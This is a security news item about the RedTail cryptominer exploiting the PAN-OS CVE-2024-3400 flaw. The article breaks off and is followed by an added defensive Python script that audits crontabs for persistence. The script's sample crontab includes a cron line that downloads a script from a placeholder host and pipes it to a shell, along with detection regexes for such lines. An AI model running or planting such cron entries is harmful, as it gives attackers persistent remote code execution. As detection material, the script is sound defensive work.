RedTail Cryptominer Exploits Critical Zero-Day in PAN-OS

A new wave of cyberattacks has been reported, leveraging a critical zero-day vulnerability in Palo Alto Networks’ firewall software, PAN-OS. The flaw, identified as CVE-2024-3400 and assigned a maximum CVSS score of 10.0, enables unauthenticated attackers to execute arbitrary code with root privileges, significantly compromising the security of affected systems. 

Researchers from Akamai have observed that the RedTail cryptomining malware is exploiting this vulnerability. The malware is notably sophisticated, exhibiting a deep understanding of cryptomining operations. Unlike typical cryptomining software that uses public mining pools, RedTail’s operators have established private mining pools or proxies. This approach allows for greater control over mining outcomes despite the higher operational and financial costs involved. 
Updated Tools and Techniques: The latest version of RedTail, active since late April, includes several updated tools:

Encrypted Mining Configuration: This adds a layer of security and obfuscation to the malware’s operations.
Self-Process Debugging: A tactic to evade analysis and hinder detection.
Cron Job Integration: Ensures persistence by automatically restarting the malware after the system reboots.
Usage of RandomX Algorithm: Boosts mining

[…]
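The cron-job persistence described above is the one item in the list a defender can check for directly on a Linux host. The following audit script is an added example (it is not from the article, Akamai or the RedTail analysis): it parses user-crontab lines and flags entries that run at boot, execute from world-writable directories, pipe a download into a shell, or decode base64 at run time. The suspicious-directory list and regexes are heuristic assumptions to be tuned per environment, and the sample crontab is constructed for illustration, not a real indicator from an infected host.

```python
"""Audit crontab text for reboot-triggered or otherwise suspicious entries.

Added example for the persistence mechanism described above; the sample
crontab below is constructed and the heuristics are assumptions to tune.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Assumption: legitimate scheduled jobs rarely execute from these paths.
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Assumption: download-and-pipe-to-shell and runtime base64 decoding are
# worth a look in any scheduled job.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
DECODE_EXEC = re.compile(r"base64\s+(-d|--decode)\b")


@dataclass
class Finding:
    line_no: int
    entry: str
    reasons: List[str] = field(default_factory=list)


def parse_cron_line(line: str) -> Optional[Tuple[str, str]]:
    """Return (schedule, command) for a user-crontab job line.

    Comments, blank lines and VAR=value environment lines return None.
    """
    s = line.strip()
    if not s or s.startswith("#"):
        return None
    if s.startswith("@"):  # @reboot, @daily, ... followed by the command
        parts = s.split(None, 1)
        return parts[0], (parts[1] if len(parts) > 1 else "")
    parts = s.split(None, 5)  # five time fields, then the command
    if len(parts) < 6:
        return None  # environment assignment or malformed line
    return " ".join(parts[:5]), parts[5]


def audit_crontab(text: str) -> List[Finding]:
    """Return one Finding per job line that matches any heuristic."""
    findings: List[Finding] = []
    for n, line in enumerate(text.splitlines(), 1):
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        schedule, command = parsed
        reasons = []
        if schedule == "@reboot":
            reasons.append("runs at boot (@reboot)")
        if any(d in command for d in SUSPICIOUS_DIRS):
            reasons.append("executes from a world-writable directory")
        if PIPE_TO_SHELL.search(command):
            reasons.append("downloads and pipes to a shell")
        if DECODE_EXEC.search(command):
            reasons.append("decodes base64 at run time")
        if reasons:
            findings.append(Finding(n, line.strip(), reasons))
    return findings


# Constructed sample crontab; the host name is a placeholder, not an IoC.
SAMPLE_CRONTAB = """\
# constructed sample, not taken from a real infected host
SHELL=/bin/sh
0 2 * * * /usr/bin/logrotate /etc/logrotate.conf
@reboot /tmp/.x/miner -c /tmp/.x/config.json
*/5 * * * * curl -s http://PLACEHOLDER.invalid/i.sh | sh
@reboot /usr/local/bin/backup-agent --daemon
"""


if __name__ == "__main__":
    # On a live host, feed in the output of `crontab -l` for each user.
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {f.entry}")
        for r in f.reasons:
            print(f"    - {r}")
```

Run it against `crontab -l -u <user>` output for every account; a legitimate `@reboot` job is still reported, because the point of the audit is to produce a short review list rather than a verdict, and entries combining several reasons (boot trigger plus a payload under /tmp) are the ones to look at first.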

This article has been indexed from CySecurity News – Latest Information Security and Hacking Incidents
